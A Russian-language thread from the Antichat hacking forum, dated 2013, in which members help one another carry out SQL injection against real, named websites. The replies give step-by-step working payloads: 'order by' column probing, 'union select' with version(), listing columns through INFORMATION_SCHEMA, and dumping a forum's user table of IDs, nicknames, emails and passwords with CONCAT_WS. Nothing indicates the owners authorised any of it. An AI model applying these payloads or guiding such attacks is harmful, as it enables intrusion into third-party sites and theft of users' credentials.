ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
12.01.2013, 12:59
|
|
Guest
Сообщений: n/a
Провел на форуме:
658
Репутация:
0
|
|
Всем привет, нашел ошибку - http://www.patriciapiccinini.net/news.php?id=46'
Далее что - то не получается никак... Помогите, очень интересно двигаться в этом направлении.
|
|
|
|
12.01.2013, 13:10
|
|
Guest
Сообщений: n/a
Провел на форуме:
290351
Репутация:
173
|
|
satana_name
Сообщение от None
http://www.patriciapiccinini.net/news.php?id=46+order+by+7--+
ошибка
Сообщение от None
http://www.patriciapiccinini.net/news.php?id=46+order+by+6--+
Норм
Посмотрели
Сообщение от None
http://www.patriciapiccinini.net/news.php?id=-46+union+select+1,2,3,4,5,6--+
3
Сообщение от None
http://www.patriciapiccinini.net/news.php?id=-46+union+select+1,2,version(),4,5,6--+
версия
5.0.67-community
дальше читай тему в которой ты отписался, и незачем сюда что то писать! есть отдельная тема |
|
|
|
12.01.2013, 13:19
|
|
Guest
Сообщений: n/a
Провел на форуме:
658
Репутация:
0
|
|
OxoTnik, спасибо, с темой уяснил.
|
|
|
|
03.03.2013, 18:54
|
|
Познающий
Регистрация: 10.09.2009
Сообщений: 40
Провел на форуме:
72737
Репутация:
1
|
|
Есть ли тут скуля ?
http://propelarizona.com/member/278
http://propelarizona.com/member/173/50
|
|
|
03.03.2013, 19:04
|
|
Guest
Сообщений: n/a
Провел на форуме:
290351
Репутация:
173
|
|
Сообщение от pharm_all
pharm_all said:
Есть ли тут скуля ?
http://propelarizona.com/member/278
http://propelarizona.com/member/173/50
Скуля есть, для простоты инъекций используй url http://propelarizona.com/member/ 173/blog_id=50
|
|
|
|
04.03.2013, 02:43
|
|
Познающий
Регистрация: 10.09.2009
Сообщений: 40
Провел на форуме:
72737
Репутация:
1
|
|
Сообщение от OxoTnik
OxoTnik said:
Скуля есть, для простоты инъекций используй url http://propelarizona.com/member/
173/blog_id=50
Не могу понять, там 3 версия мускула? Почему -то не выводит unionom 19 вроде полей.
|
|
|
|
19.03.2013, 06:26
|
|
Новичок
Регистрация: 29.01.2010
Сообщений: 0
Провел на форуме:
2508
Репутация:
0
|
|
объясните плиз что такое подзапросы...
|
|
|
|
31.03.2013, 10:20
|
|
Guest
Сообщений: n/a
Провел на форуме:
5126
Репутация:
5
|
|
Сообщение от None
И вот мы нашли поля login, password.
а что дальше, как их выбирать?
запрос
Код HTML:
HTML:
?q=532&n=108316' and 1=0 union select 1,COLUMN_NAME,3,4,5,6,7 FROM INFORMATION_SCHEMA.COLUMNS where table_name='aph_forum_users' --
Выводит
Id
Nik
Email
Pasw
|
|
|
|
31.03.2013, 11:06
|
|
Guest
Сообщений: n/a
Провел на форуме:
18665
Репутация:
27
|
|
Сообщение от LomasterII
LomasterII said:
а что дальше, как их выбирать?
запрос
Код HTML:
HTML:
?q=532&n=108316' and 1=0 union select 1,COLUMN_NAME,3,4,5,6,7 FROM INFORMATION_SCHEMA.COLUMNS where table_name='aph_forum_users' --
Выводит
Id
Nik
Email
Pasw Ну у Вас выводятся имена столбцов таблицы. Чтобы вывести значения этих столбцов, просто впишите в запрос имена и укажите с какой таблицы делать выборку. В Вашем случает примерно так...
?q=532&n=108316' and 1=0 union select 1,CONCAT_WS(0x3a,Id,Nik,Email,Pasw),3,4,5,6,7 FROM aph_forum_users --
|
|
|
|
08.10.2013, 00:12
|
|
Guest
Сообщений: n/a
Провел на форуме:
303
Репутация:
0
|
|
я вот непойму,
ну допустим есть уязвимый параметр id который попадает к примеру в такой запрос
SELECT `domain` FROM `mpm` where `id` ='2'
вот я например хочу вывести данные из информатион скхема
SELECT `domain` FROM `mpm` where `id` ='2' union select
`table_name` from information_schema.tables limit+0,1
почему в ответ пишет Unknown table 'mpm' in information_schema ???
(тестирую в phpmyadimn)
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид